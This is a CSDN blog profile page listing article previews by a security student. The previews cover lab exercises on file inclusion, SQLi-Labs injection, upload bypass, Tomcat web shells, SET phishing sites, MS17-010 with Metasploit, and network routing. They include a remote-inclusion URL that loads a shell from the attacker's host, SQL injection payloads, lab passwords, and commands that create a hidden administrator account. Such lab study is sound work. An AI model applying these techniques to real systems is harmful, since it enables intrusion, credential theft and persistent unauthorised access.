干饭人666
码龄3年
关注
提问 私信
  • 博客:35,173
    35,173
    总访问量
  • 34
    原创
  • 1,379,047
    排名
  • 8
    粉丝
  • 0
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:上海市
  • 加入CSDN时间: 2021-11-23
博客简介:

m0_64338210的博客

查看详细资料
个人成就
  • 获得2次点赞
  • 内容获得0次评论
  • 获得32次收藏
创作历程
  • 11篇
    2022年
  • 23篇
    2021年
成就勋章
兴趣领域 设置
  • 网络空间安全
    web安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

文件包含 (无视后缀)apache日志 远程文件包含 php封装伪协议:

1.本地文件包含:(无视后缀)2.远程文件包含远程包含shellallow_url_include开启访问: http://目标机ip/index.php?page=http://操作机ip/shell.txt目标机:操作机:3.apache日志文件包含个体get.shell修改文件 httpd.conf# CustomLog "logs/access.log" common去掉前面这个#号重启 apache访问http;//127.0.0.1:8
原创
发布博客 2022.02.28 ·
378 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

sql 1~5关

第一关:1.访问SQLI-Labs网站,进入靶场右键打开检查,进入到Hackbar(火狐插件)输入http://ip/sqli-labs/less-1/?id=1点击Execute观察页面变化此时页面显示id=1的用户名Dump、密码Dump。2.寻找注入点分别使用以下3条payload寻找注入点及判断注入点的类型:http://ip/sqli-labs/less-1/?id=1' //报错http://ip/sqli-labs/less-1/?id=1'..
原创
发布博客 2022.02.24 ·
254 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

Tomcat

把拖到/root下解压这个zip安装包:unzip vulhub-master查看解压文件:ls进入tomcat/下:查看tomcat路径:ls进入这个路径:安装docker-composedocker-compose up -d访问:访问http://ip+端口通过BurpSuite抓包点server点shell.jsp 把里面东西复制到抓的包下面连接冰蝎
原创
发布博客 2022.02.24 ·
156 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

upload 1-5关

Upload第一关上传一个1.php文件,内容<?php phpinfo(); ?>在浏览右键选择检查第二关这一关是常见验证中的文件类型验证,也就是验证MIME信息上传一个2.php文件 内容<?php phpinfo(); ?>通过BurpSuite抓包右键点击send to repeater第三关查看源代码,我们可以发现是一个黑名单验证上一篇讲过黑名单是规定不允许上传的文件,但是如果黑名单定义不完整的
原创
发布博客 2022.02.24 ·
3243 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

数字型,字符型POST注入

实验步骤本实验的目标是:以SQLi-Labs网站的Less-11为入口,利用联合查询(unionselect)的方式实施SQL注入,获取 SQLi-Labs 网站的登录用户名和密码。1.访问SQLi-Labs网站在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-11。访问的URL为:http://[靶机IP]/sqli-labs/Less-11/2.利用Burpsuite 工具抓包(1)启动Burp
原创
发布博客 2022.02.17 ·
364 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

数字型,字符型GET注入

SQL注入基于联合查询的字符型GET注入实验步骤:1.访问SQLi-Labs 网站在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的sQLi-Labs 网站 Less-2。访问的URL为:http:/ /[靶机 IP]/sqli-labs/Less-2/正在上传…重新上传取消登录后,根据网页提示,先给定一个GET参数,即:http:// [靶机IP]/sqli-labs/Less-2 /?id=1此时页面显示 id=1的用户名Du
原创
发布博客 2022.02.16 ·
3131 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

sql注入数据库操作基础

连接数据库输入命令:mysql -u root -p显示系统中所有数据库名称输入命令:show databases;新建数据库student命令:create database student;查看结果:show databases;使用数据库student命令:use student;在数据库student中创建表result命令:create table result(id int(8),name varchar(20),city varchar(20),s..
原创
发布博客 2022.02.13 ·
726 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

DNS信息查询

1.环境测试使用ping ,nslookup ,whois等命令,能够对域名做正确的DNS解析2.工具Whois nslookup dig subDonmainsBrute ip反查步骤利用相关命令进行针对域名的信息收集确定目标:sangforedu.com.cn sangfor.com.cn本次实验需要对该目标下的域名,ip进行信息收集使用whois命令对该域名进行查询:whois sangfor...
原创
发布博客 2022.01.16 ·
2369 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

子域名收集

实验步骤子域名爆破工具安装爆破工具登录kali 终端输出命令:git clone https://github.com/lijiejie/subDomainsBrute下载子域名爆破工具subDomainsBrute增加执行权限进入工具的文件夹,使用命令chomd +x subDomainsBrute给执行脚本程序赋予执行权限由此图可见,已成功给脚本文件增加执行权限使用工具,检查对应的域名存在的子域名注意:禁止对非授权域名进行探测,爆破,避免触犯国家相关法律法规
原创
发布博客 2022.01.16 ·
1526 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

渗透测试环境搭建与工具使用-SET配置使用

实验目的熟悉SET的配置使用,掌握利用SET构建钓鱼网站的方法。实验环境操作机:Kali2018-TS(1)操作系统:KaliLinux2018.4(2)登录账号密码:操作系统帐号root,密码Sangfor!7890靶机:pt-env(1)操作系统:Windows7(2)安装的应用软件:PHPStudy2013、DVWA漏洞网站环境(3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890实验原理SET(SocialE...
原创
发布博客 2022.01.14 ·
2632 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

渗透测试环境搭建与metasploit工具使用

-Metasploit配置使用2实验目的熟悉ms17-010漏洞的原理及利用方法,掌握Metasploit的配置使用方法。实验环境操作机:Kali2018-TS(1)操作系统:Kali Linux 2018.4(2)登录账号密码:操作系统帐号root,密码Sangfor!7890靶机 pt-env(1)操作系统:Windows(2)安装的应用软件:PHPStudy 2013、DVWA漏洞网站环境(3)登录账号密码:操作系统帐号Administrator,密码Sangf
原创
发布博客 2022.01.13 ·
543 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

GER隧道 通用路由封装(GRE) 协议,实现互通

AR1#interface GigabitEthernet0/0/0ip address 172.16.1.254 255.255.255.0#interface GigabitEthernet0/0/1ip address 100.100.100.1 255.255.255.252ip route-static 0.0.0.0 0.0.0.0 100.100.100.2 //默认路由配置gre隧道#interface Tunnel0/0/1 ...
原创
发布博客 2021.12.30 ·
1069 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

单臂路由

单臂路由Lws1:vlan batch 10 20interface Ethernet0/0/1port link-type accessport default vlan 10interface Ethernet0/0/2port link-type accessport default vlan 10interface Ethernet0/0/3port link-type accessport default vlan 20interface Eth
原创
发布博客 2021.12.23 ·
1199 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

access与trunk 实现相同vlan互通

vlan batch 10 20interface Ethernet0/0/1port link-type accessport default vlan 10qinterface Ethernet0/0/2port link-type accessport default vlan 20qinterface Ethernet0/0/3port link-type trunkport trunk allow-pass vlan 2 to 4094...
原创
发布博客 2021.12.23 ·
1519 阅读 ·
0 点赞 ·
0 评论 ·
5 收藏

动态路由 通过ospf(动态路由)协议,实现相互通信

拓扑图先配置IP地址AR1sysint g0/0/0ip address 192.168.1.2 30int g0/0/1ip address 192.168.2.1 30AR2sysint g0/0/0ip address 192.168.2.2 30int g0/0/2ip address 192.168.6.1 30int g0/0/1ip address 192.168.3.1 30AR3sysint g0/0/0ip address 192....
原创
发布博客 2021.12.23 ·
2086 阅读 ·
0 点赞 ·
0 评论 ·
5 收藏

三层交换 VLAN间通过VlanIf(虚接口)进行通信

VLAN间通过VlanIf(虚接口)进行通信创建VLANsysvlan batch 10 20配置接口加入vlanint e0/0/1post link-type accessport default vlan 10int e0/0/2post link-type accessport default vlan 10int e0/0/3post link-type accessport default vlan 20int e0/0/4post
原创
发布博客 2021.12.23 ·
1096 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

TCP/IP协议栈模型分析

OSI的七种模型1 物理层 在媒介上传输比特流,提供机械和电气的规约。2 数据链路层 将分组数据封装成帧,在数据链路上实现数据的点到点,或点到多点方式的直接通信,差错检测。3 网络层 定义逻辑地址,实现数据从源到目的的转发。4 传输层 建立,维护和取消一次端到端的数据传输过程,控制传输节奏的快慢,调制数据的排序等等。5 会话层 在通信双方之间建立,管理和终止会话。6 表示层 进行数据格式的转换,以确保一个系统生成的应用层数据能够被另一个系统的应用层数据所识别和理解。7 应用层 对
原创
发布博客 2021.12.21 ·
641 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Windows隐藏账户处置

实验目的理解windows隐藏账户建立原理,掌握windows隐藏账户处置过程实验环境一台windows server 2012 r2实验原理通过注册表实现隐藏账户的建立,可以通过手工来建立隐藏账户实验步骤一、使用命令行创建用户1、打开命令行2、新建test$用户net user test$ sxf!7890 /addnet localgroup administrators test$ /add二、观察test$用户1、使用系统...
原创
发布博客 2021.12.15 ·
103 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

基线管理之apache安全配置

实验目的理解apache安全配置项的作用,掌握安全配置项的配置方法实验原理通过编辑apache配置文件实现apache的安全配置,apache默认配置文件路径是/etc/httpd/conf/httpd.conf一、确保apache无法访问根目录查看apache配置文件,确定里面对根目录是拒绝所有请求vim /etc/httpd/conf/httpd.其中,第一行和第四行,指明了目录,即Linux的根目录 /第二行,表示禁止使用.htaccess文件,覆盖此处配.
原创
发布博客 2021.12.14 ·
96 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

基线管理之MariaDB安全配置

1、操作系统级权限检查(1)、检查数据库的运行权限,不建议以root运行数据库,防止越权攻击 ps -ef | egrep "^mysql.*$"(2)禁用mariadb的历史记录功能 查找缓存文件 find $HOME -name ".mysql_history"将缓存文件指向空文件rm -f $HOME/.mysql_historyln -s /dev/null $HOME/.mysql_history(3)、查看并配置数据...
原创
发布博客 2021.12.14 ·
651 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏
加载更多